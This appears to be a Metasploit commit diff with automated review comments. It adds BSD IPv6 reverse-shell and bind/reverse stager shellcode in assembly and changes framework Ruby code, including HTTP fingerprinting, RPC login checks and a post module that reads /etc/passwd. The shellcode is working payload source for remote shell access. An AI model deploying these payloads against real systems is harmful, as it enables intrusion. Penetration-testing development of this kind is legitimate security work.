42 external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm
@@ -0,0 +1,42 @@
+;;
+;
+; Name: single_reverse_tcp_shell
+; Version: $Revision: 1626 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Single reverse TCP shell.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Reverse TCP Shell
+; meta-description=Connect back to the attacker and spawn a shell
+; meta-authors=skape <mmiller [at] hick.org>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=single
+; meta-connection-type=reverse
+; meta-name=reverse_tcp_shell
+; meta-basemod=Msf::PayloadComponent::ReverseConnection
+; meta-offset-lhost=0x0a
+; meta-offset-lport=0x13
+;;
+BITS 32
+
+%define USE_SINGLE_STAGE 1
+%define ASSUME_REG_EAX 0
+
+; If you're on FreeBSD you can assume the state of edx to be 2, but NetBSD
+; clears edx.
+; %define ASSUME_REG_EDX 2
+
+%include "stager_sock_reverse_ipv6.asm"
+%include "generic.asm"
+
+shell:
+ execve_binsh EXECUTE_REDIRECT_IO
108 external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm
@@ -0,0 +1,108 @@
+;;
+;
+; Name: stager_sock_bind_ipv6
+; Qualities: Can Have Nulls
+; Version: $Revision: 1628 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Implementation of a BSD portbind over IPv6 TCP stager.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Bind TCP Stager
+; meta-description=Listen on a port for a connection and run a second stage
+; meta-authors=skape <mmiller [at] hick.org>, vlad902 <vlad902 [at] gmail.com>, hdm <hdm [at] metasploit.com>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=stager
+; meta-connection-type=bind
+; meta-name=bind_tcp_ipv6
+; meta-basemod=Msf::PayloadComponent::BindConnection
+; meta-offset-lport=26
+;;
+BITS 32
+GLOBAL main
+
+main:
+
+socket:
+ xor eax, eax
+ push eax ; Protocol: (IP=0)
+ inc eax
+ push eax ; Type: (SOCK_STREAM=1)
+ push byte 28 ; Domain: (PF_INET6=28)
+ push byte 97
+ pop eax ; socket()
+ push eax ; padding
+ int 0x80
+ mov ebx, eax ; save socket
+
+ xor edx, edx
+
+ push edx ; uint32_t sin6_scope_id; /* scope zone index */
+ push edx ; struct in6_addr sin6_addr; /* IP6 address */
+ push edx
+ push edx
+ push edx
+ push edx ; uint32_t sin6_flowinfo; /* IP6 flow information */
+ push dword 0xbfbf1c1c
+ ; in_port_t sin6_port; /* Transport layer port # */
+ ; uint8_t sin6_len; /* length of this struct */
+ ; sa_family_t sin6_family; /* AF_INET6 */
+
+ mov ecx, esp
+
+bind:
+ push byte 28
+ push ecx
+ push eax
+ push byte 104
+ pop eax
+ push eax ; padding
+ int 0x80
+
+listen:
+ mov al, 106
+ int 0x80
+
+accept:
+ push edx
+ push ebx
+%ifndef USE_SINGLE_STAGE
+ mov dh, 0x10
+%endif
+ push edx
+ mov al, 30
+ int 0x80
+
+%ifndef USE_SINGLE_STAGE
+
+read:
+ push ecx
+ push eax
+ push ecx
+%ifdef FD_REG_EBX
+ xchg eax, ebx
+%else
+ xchg eax, edi
+%endif
+ push byte 0x3
+ pop eax
+ int 0x80
+ ret
+
+%else
+
+%ifdef FD_REG_EBX
+ xchg eax, ebx
+%else
+ xchg eax, edi
+%endif
+
+%endif
112 external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
@@ -0,0 +1,112 @@
+;;
+;
+; Name: stager_sock_reverse_ipv6
+; Qualities: Can Have Nulls
+; Version: $Revision: 1626 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Implementation of a BSD reverse TCP stager over IPv6
+;
+; File descriptor in edi.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Reverse TCP Stager
+; meta-description=Connect back to the framework and run a second stage
+; meta-authors=skape <mmiller [at] hick.org>, vlad902 <vlad902 [at] gmail.com>, hdm <hdm [at] metasploit.com>
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=stager
+; meta-connection-type=reverse
+; meta-name=reverse_tcp_ipv6
+; meta-basemod=Msf::PayloadComponent::ReverseConnection
+; meta-offset-lhost=43
+; meta-offset-lport=36
+; meta-offset-scope=59
+;;
+BITS 32
+GLOBAL main
+
+main:
+
+socket:
+
+ xor eax, eax
+ push eax ; Protocol: (IP=0)
+ inc eax
+ push eax ; Type: (SOCK_STREAM=1)
+ push byte 28 ; Domain: (PF_INET6=28)
+
+ push byte 97
+ pop eax ; socket()
+ push eax ; padding
+ int 0x80
+ jmp short bounce_to_connect
+
+connect:
+ pop ecx
+ push byte 28
+ push ecx
+ push eax
+
+%ifdef FD_REG_EBX
+ xchg eax, ebx
+%else
+ xchg eax, edi
+%endif
+
+ push byte 98
+ pop eax
+ push eax ; padding
+ int 0x80
+
+ jmp short skip_bounce
+
+bounce_to_connect:
+ call connect
+
+ipv6_address:
+ db 28 ; uint8_t sin6_len; /* length of this struct */
+ db 28 ; sa_family_t sin6_family; /* AF_INET6 */
+ dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */
+ dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */
+ dd 0 ; struct in6_addr sin6_addr; /* IP6 address */
+ dd 0
+ dd 0
+ dd 0x01000000 ; default to ::1
+ dd 0 ; uint32_t sin6_scope_id; /* scope zone index */
+
+skip_bounce:
+
+%ifndef USE_SINGLE_STAGE
+
+read:
+ push byte 0x10
+ pop edx
+ shl edx, 8
+ sub esp, edx
+ mov ecx, esp ; Points to 4096 stack buffer
+
+ push edx ; Length
+ push ecx ; Buffer
+
+%ifdef FD_REG_EBX
+ push ebx ; Socket
+%else
+ push edi ; Socket
+%endif
+
+ push ecx ; Buffer to Return
+
+ mov al, 0x3
+ int 0x80 ; read(socket, &buff, 4096)
+
+ ret ; Return
+
+%endif
50 lib/fastlib.rb
@@ -37,7 +37,7 @@
#
class FastLib
- VERSION = "0.0.6"
+ VERSION = "0.0.8"
FLAG_COMPRESS = 0x01
FLAG_ENCRYPT = 0x02
@@ -249,22 +249,31 @@ def self.post_process(lib, name, data)
#
# This is a stub crypto handler that performs a basic XOR
- # operation against a fixed one byte key
+ # operation against a fixed one byte key. The two usable IDs
+ # are 12345600 and 00000000
#
def self.encrypt_12345600(data)
- data.unpack("C*").map{ |c| c ^ 0x90 }.pack("C*")
+ encrypt_00000000(data)
end
def self.decrypt_12345600(data)
- encrypt_12345600(data)
+ encrypt_00000000(data)
end
- def self.cache
- @@cache
+ def self.encrypt_00000000(data)
+ data.unpack("C*").map{ |c| c ^ 0x90 }.pack("C*")
end
-
-
+ def self.decrypt_00000000(data)
+ encrypt_00000000(data)
+ end
+
+ #
+ # Expose the cache to callers
+ #
+ def self.cache
+ @@cache
+ end
end
@@ -330,6 +339,7 @@ def self.cache
4 bytes: "FAST"
4 bytes: NBO header length
+ 4 bytes: NBO flags (24-bit crypto ID, 8 bit modes)
[
4 bytes: name length (0 = End of Names)
4 bytes: data offset
@@ -343,6 +353,12 @@ def self.cache
module Kernel #:nodoc:all
alias :fastlib_original_require :require
+
+ #
+ # Store the CWD when were initially loaded
+ # required for resolving relative paths
+ #
+ @@fastlib_base_cwd = ::Dir.pwd
#
# This method hooks the original Kernel.require to support
@@ -360,22 +376,16 @@ def fastlib_require(name)
return false if fastlib_already_loaded?(name)
return false if fastlib_already_tried?(name)
- # TODO: Implement relative path $: checks and adjust the
- # search path within archives to match.
-
- $:.map{ |path| ::Dir["#{path}/*.fastlib"] }.flatten.uniq.each do |lib|
+ # XXX Implement relative search paths within archives
+ $:.map{ |path|
+ (path =~ /^([A-Za-z]\:|\/)/ ) ? path : ::File.expand_path( ::File.join(@@fastlib_base_cwd, path) )
+ }.map{ |path| ::Dir["#{path}/*.fastlib"] }.flatten.uniq.each do |lib|
data = FastLib.load(lib, name)
next if not data
$" << name
- begin
- Object.class_eval(data)
- rescue ::Exception => e
- opath,oerror = e.backtrace.shift.split(':', 2)
- e.backtrace.unshift("#{lib}::#{name}:#{oerror}")
- raise e
- end
-
+ Object.class_eval(data, lib + "::" + name)
+
return true
end
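Review bot: The absolute-path test in the new `$:` mapping, `path =~ /^([A-Za-z]\:|\/)/`, is anchored with `^`, which matches at the start of any line rather than of the string; `\A` is the right anchor for a whole-value check, and the backslash before `:` does nothing: `(path =~ /\A([A-Za-z]:|\/)/) ? path : ::File.expand_path(::File.join(@@fastlib_base_cwd, path))`. Separately, `@@fastlib_base_cwd = ::Dir.pwd` is a class variable on Kernel, which Object mixes in, so every object in the process sees and can reassign it; a frozen constant or a module-level instance variable behind a small accessor would be less invasive. fastlib_require's body continues outside the hunk.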
25 lib/msf/core/db.rb
@@ -1475,6 +1475,7 @@ def reports(wspace=workspace)
#
# opts can contain
# +:options+:: a hash of options for accessing this particular web site
+ # +:info+:: if present, report the service with this info
#
# Duplicate records for a given host, port, vhost combination will be overwritten
#
@@ -1487,13 +1488,15 @@ def report_web_site(opts)
port = nil
name = nil
serv = nil
+ info = nil
if opts[:service] and opts[:service].kind_of?(Service)
serv = opts[:service]
else
addr = opts[:host]
port = opts[:port]
name = opts[:ssl] ? 'https' : 'http'
+ info = opts[:info]
if not (addr and port)
raise ArgumentError, "report_web_site requires service OR host/port/ssl"
end
@@ -1528,8 +1531,12 @@ def report_web_site(opts)
if opts.keys.include?(:ssl) or serv.name.to_s.empty?
name = opts[:ssl] ? 'https' : 'http'
serv.name = name
- serv.save!
end
+ # Add the info if it's there.
+ unless info.to_s.empty?
+ serv.info = info
+ end
+ serv.save! if serv.changed?
=begin
host.updated_at = host.created_at
host.state = HostState::Alive
@@ -4875,19 +4882,11 @@ def find_qualys_asset_vuln_refs(doc)
next unless vuln.elements['QID'] && vuln.elements['QID'].first
qid = vuln.elements['QID'].first.to_s
vuln_refs[qid] ||= []
- if vuln.elements["CVE_ID_LIST/CVE_ID/ID"]
- vuln.elements["CVE_ID_LIST/CVE_ID/ID"].each do |ref|
- next unless ref
- next unless ref.to_s[/^C..-[0-9\-]{9}/]
- vuln_refs[qid] << ref.to_s.gsub(/^C../, "CVE")
- end
+ vuln.elements.each('CVE_ID_LIST/CVE_ID') do |ref|
+ vuln_refs[qid].push('CVE-' + /C..-([0-9\-]{9})/.match(ref.elements['ID'].text.to_s)[1])
end
- if vuln.elements["BUGTRAQ_ID_LIST/BUGTRAQ_ID/ID"]
- vuln.elements["BUGTRAQ_ID_LIST/BUGTRAQ_ID/ID"].each do |ref|
- next unless ref
- next unless ref.to_s[/^[0-9]{1,9}/]
- vuln_refs[qid] << "BID-#{ref}"
- end
+ vuln.elements.each('BUGTRAQ_ID_LIST/BUGTRAQ_ID') do |ref|
+ vuln_refs[qid].push('BID-' + ref.elements['ID'].text.to_s)
end
end
return vuln_refs
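Review bot: The rewritten Qualys reference loops dereference `ref.elements['ID']` and the `MatchData` unconditionally, so a `<CVE_ID>` with no `<ID>` child, or an ID that is not in the `C..-nnnnnnnnn` shape, raises NoMethodError and aborts the whole import, where the old code skipped such entries with `next unless`. The BUGTRAQ branch likewise no longer checks that the ID is numeric before pushing `BID-...`. The rewrite below restores both guards while keeping the `elements.each` form; find_qualys_asset_vuln_refs starts outside the hunk.
```ruby
      vuln.elements.each('CVE_ID_LIST/CVE_ID') do |ref|
        id = ref.elements['ID']
        m = id && /C..-([0-9\-]{9})/.match(id.text.to_s)
        vuln_refs[qid] << "CVE-#{m[1]}" if m
      end
      vuln.elements.each('BUGTRAQ_ID_LIST/BUGTRAQ_ID') do |ref|
        id = ref.elements['ID']
        next unless id && id.text.to_s =~ /\A[0-9]{1,9}\z/
        vuln_refs[qid] << "BID-#{id.text}"
      end
```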
8 lib/msf/core/event_dispatcher.rb
@@ -58,6 +58,7 @@ class EventDispatcher
def initialize(framework)
self.framework = framework
self.general_event_subscribers = []
+ self.custom_event_subscribers = []
self.exploit_event_subscribers = []
self.session_event_subscribers = []
self.db_event_subscribers = []
@@ -181,7 +182,7 @@ def method_missing(name, *args)
sub.send(name, *args)
end
else
- general_event_subscribers.each do |sub|
+ (general_event_subscribers + custom_event_subscribers).each do |sub|
next if not sub.respond_to?(name)
sub.send(name, *args)
found = true
@@ -198,9 +199,7 @@ def method_missing(name, *args)
remove_event_subscriber(self.send(subscribers), *args)
end
end
- if not found
- elog("Event dispatcher received an unhandled event: #{name}")
- end
+
return found
end
@@ -222,6 +221,7 @@ def remove_event_subscriber(array, subscriber) # :nodoc:
end
attr_accessor :general_event_subscribers # :nodoc:
+ attr_accessor :custom_event_subscribers # :nodoc:
attr_accessor :exploit_event_subscribers # :nodoc:
attr_accessor :session_event_subscribers # :nodoc:
attr_accessor :db_event_subscribers # :nodoc:
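Review bot: Removing the `elog("Event dispatcher received an unhandled event: #{name}")` branch means an event nobody subscribes to, including a misspelt name at a call site such as the new `on_httpserver_request`, now just returns false with no trace anywhere. If the motive is to keep custom events from filling the error log when no subscriber is registered, a lower-severity `dlog("Event dispatcher received an unhandled event: #{name}") if not found` keeps the diagnostic without the noise. Since custom subscribers are now folded into the general dispatch via `(general_event_subscribers + custom_event_subscribers).each`, the new accessor would benefit from a comment such as `# Subscribers that receive any event without a dedicated subscriber list`. method_missing starts outside the hunk.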
6 lib/msf/core/exploit/capture.rb
@@ -99,7 +99,11 @@ def open_pcap(opts={})
self.capture = ::Pcap.open_offline(cap)
else
dev ||= ::Pcap.lookupdev
- system("ifconfig", dev, "up")
+
+ unless RUBY_PLATFORM == "i386-mingw32"
+ system("ifconfig", dev, "up")
+ end
+
self.capture = ::Pcap.open_live(dev, len, true, tim)
if arp
self.arp_capture = ::Pcap.open_live(dev, 512, true, tim)
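Review bot: The new guard `unless RUBY_PLATFORM == "i386-mingw32"` only covers 32-bit mingw, so 64-bit mingw and mswin builds still shell out to `ifconfig`, which does not exist there; a pattern covers them all: `unless RUBY_PLATFORM =~ /mingw|mswin/`. The `system` return value is also ignored, so a failure to bring the interface up stays silent until the capture is empty. open_pcap's body continues outside the hunk.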
35 lib/msf/core/exploit/http/client.rb
@@ -543,7 +543,7 @@ def vhost
# Returns the boolean indicating SSL
#
def ssl
- ((datastore.default?('SSL') and rport.to_i == 443) or datastore['SSL'])
+ ((datastore.default?('SSL') and [443,3790].include?(rport.to_i)) or datastore['SSL'])
end
#
@@ -603,20 +603,13 @@ def http_fingerprint(opts={})
# Bail if we don't have anything to fingerprint
return if not res
-
+
# From here to the end simply does some pre-canned combining and custom matches
# to build a human-readable string to store in service.info
extras = []
-
- case res.code
- when 301,302
- extras << "#{res.code}-#{res.headers['Location']}"
- when 401
- extras << "#{res.code}-#{res.headers['WWW-Authenticate']}"
- when 403
- extras << "#{res.code}-#{res.headers['WWW-Authenticate']||res.message}"
- when 500 .. 599
- extras << "#{res.code}-#{res.message}"
+
+ if res.headers['Set-Cookie'] =~ /^vmware_soap_session/
+ extras << "VMWare Web Services"
end
if (res.headers['X-Powered-By'])
@@ -637,7 +630,7 @@ def http_fingerprint(opts={})
when /openAboutWindow.*\>DD\-WRT ([^\<]+)\</
extras << "DD-WRT #{$1.strip}"
- when /ID_ESX_Welcome/
+ when /ID_ESX_Welcome/, /ID_ESX_VIClientDesc/
extras << "VMware ESX Server"
when /Test Page for.*Fedora/
@@ -657,18 +650,28 @@ def http_fingerprint(opts={})
end
if datastore['RPORT'].to_i == 3790
- if res and res.code == 302 and res.headers and res.headers['Location'] =~ /[\x5c\x2f](login|setup)$/
- if res['Server'] =~ /^thin.*No Hup$/
+ if res.code == 302 and res.headers and res.headers['Location'] =~ /[\x5c\x2f](login|setup)$/
+ if res['Server'] =~ /^(thin.*No Hup)|(nginx[\x5c\x2f][\d\.]+)$/
extras << "Metasploit"
end
end
end
+ case res.code
+ when 301,302
+ extras << "#{res.code}-#{res.headers['Location']}"
+ when 401
+ extras << "#{res.code}-#{res.headers['WWW-Authenticate']}"
+ when 403
+ extras << "#{res.code}-#{res.headers['WWW-Authenticate']||res.message}"
+ when 500 .. 599
+ extras << "#{res.code}-#{res.message}"
+ end
+
info = "#{res.headers['Server']}"
info << " ( #{extras.join(", ")} )" if extras.length > 0
# Report here even if info is empty since the fact that we didn't
# return early means we at least got a connection and the service is up
- ssl = datastore['SSL']
report_web_site(:host => rhost, :port => rport, :ssl => ssl, :vhost => vhost, :info => info.dup)
info
end
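Review bot: The alternation in the new Server-header check, `res['Server'] =~ /^(thin.*No Hup)|(nginx[\x5c\x2f][\d\.]+)$/`, binds `^` to the first branch only and `$` to the second only, so any Server value containing `nginx/1.0` anywhere, or beginning with `thin...No Hup` and continuing, matches; wrap both branches to anchor the whole value: `/^((thin.*No Hup)|(nginx[\x5c\x2f][\d\.]+))$/`. In the `ssl` helper, `[443,3790].include?(rport.to_i)` now makes every HTTP client module default to SSL on 3790, a product-specific port that the fingerprint code further down ties to Metasploit; that framework-wide default deserves a comment beside it, e.g. `# 3790 is the Metasploit web UI port, which this helper assumes is always SSL`. http_fingerprint and ssl each extend beyond their hunks.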
1 lib/msf/core/exploit/http/server.rb
@@ -112,6 +112,7 @@ def start_service(opts = {})
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
+ framework.events.on_httpserver_request(self, cli, req)
on_request_uri(cli, req)
},
'Path' => resource_uri
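Review bot: The new `framework.events.on_httpserver_request(self, cli, req)` runs inside the request Proc before `on_request_uri`, so an exception raised by any subscriber aborts handling of that client's request, and nothing visible here rescues it. Unless the caller of this Proc already catches subscriber errors, wrapping the dispatch (`begin ... rescue ::StandardError => e; elog("httpserver_request subscriber failed: #{e}"); end`) keeps one faulty subscriber from taking down the exploit's HTTP service. The call also goes through `EventDispatcher#method_missing`, which in this same commit stops logging unhandled events, so a misspelt event name would fail silently. start_service's body continues outside the hunk.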
8 lib/msf/core/exploit/mssql.rb
@@ -73,10 +73,10 @@ def initialize(info = {})
], Msf::Exploit::Remote::MSSQL)
register_advanced_options(
[
- OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
- File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
- ]),
- OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION'])
+ OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
+ File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
+ ]),
+ OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'])
], Msf::Exploit::Remote::MSSQL)
register_autofilter_ports([ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ])
register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase })
2 lib/msf/core/exploit/postgres.rb
@@ -245,7 +245,7 @@ def postgres_password
if datastore['PASSWORD'].to_s.size > 0
datastore['PASSWORD'].to_s
else
- 'INVALID_' + Rex::Text.rand_text_alpha(rand(6))
+ 'INVALID_' + Rex::Text.rand_text_alpha(rand(6) + 1)
end
end
33 lib/msf/core/post/unix/enum_user_dirs.rb
@@ -0,0 +1,33 @@
+module Msf
+class Post
+module Unix
+ include ::Msf::Post::Common
+
+ # returns all user directories found
+ def enum_user_directories
+ user_dirs = []
+
+ # get all user directories from /etc/passwd
+ read_file("/etc/passwd").each_line do |passwd_line|
+ user_dirs << passwd_line.split(/:/)[5]
+ end
+
+ # also list other common places for home directories in the event that
+ # the users aren't in /etc/passwd (LDAP, for example)
+ case session.platform
+ when 'osx'
+ user_dirs << cmd_exec('ls /Users').each_line.map { |l| "/Users/#{l}" }
+ else
+ user_dirs << cmd_exec('ls /home').each_line.map { |l| "/home/#{l}" }
+ end
+
+ user_dirs.flatten!
+ user_dirs.sort!
+ user_dirs.uniq!
+ user_dirs.compact!
+
+ user_dirs
+ end
+end
+end
+end
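Review bot: `user_dirs.sort!` runs before `user_dirs.compact!`, so a blank or malformed passwd line (whose `split(/:/)[5]` is nil) makes `sort!` raise `ArgumentError: comparison of NilClass with String failed`; compact first. The `ls /Users` and `ls /home` branches build paths from lines that still carry their newline, yielding entries like `"/home/alice\n"`; `chomp` each line. `read_file` and `cmd_exec` results are also dereferenced with no nil guard, so an unreadable `/etc/passwd` raises NoMethodError where an empty list would do; `.to_s` covers that. A `# @return [Array<String>]` YARD tag on the method would document the contract.
```ruby
  def enum_user_directories
    user_dirs = []

    # get all user directories from /etc/passwd
    read_file("/etc/passwd").to_s.each_line do |passwd_line|
      user_dirs << passwd_line.split(/:/)[5]
    end

    # … unchanged: comment about users not present in /etc/passwd …
    case session.platform
    when 'osx'
      user_dirs << cmd_exec('ls /Users').to_s.each_line.map { |l| "/Users/#{l.chomp}" }
    else
      user_dirs << cmd_exec('ls /home').to_s.each_line.map { |l| "/home/#{l.chomp}" }
    end

    # compact before sort: nil does not compare with String
    user_dirs.flatten!
    user_dirs.compact!
    user_dirs.uniq!
    user_dirs.sort!

    user_dirs
  end
```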
4 lib/msf/core/rpc/v10/rpc_auth.rb
@@ -12,6 +12,10 @@ class RPC_Auth < RPC_Base
def rpc_login_noauth(user,pass)
+ if not (user.kind_of?(::String) and pass.kind_of?(::String))
+ error(401, "Login Failed")
+ end
+
# handle authentication here
fail = true
self.users.each do |u|
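Review bot: The new type check `if not (user.kind_of?(::String) and pass.kind_of?(::String))` is only effective if `error(401, "Login Failed")` raises or otherwise ends the call; if it merely builds a response, execution falls through into the `self.users.each` comparison with non-String values. That is not visible here, so a comment beside the check confirming `error` does not return, or an explicit `return` after it, would make the guard self-evidently complete. Returning the same 401 message for malformed and for wrong credentials is the right choice, as it gives a caller no distinguishing signal. rpc_login_noauth's body continues outside the hunk.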
5 lib/msf/core/rpc/v10/service.rb
@@ -198,6 +198,11 @@ def remove_user(user)
def authenticate(token)
stale = []
+
+ if not (token and token.kind_of?(::String))
+ return false
+ end
+
# Force the encoding to ASCII-8BIT
token = token.unpack("C*").pack("C*")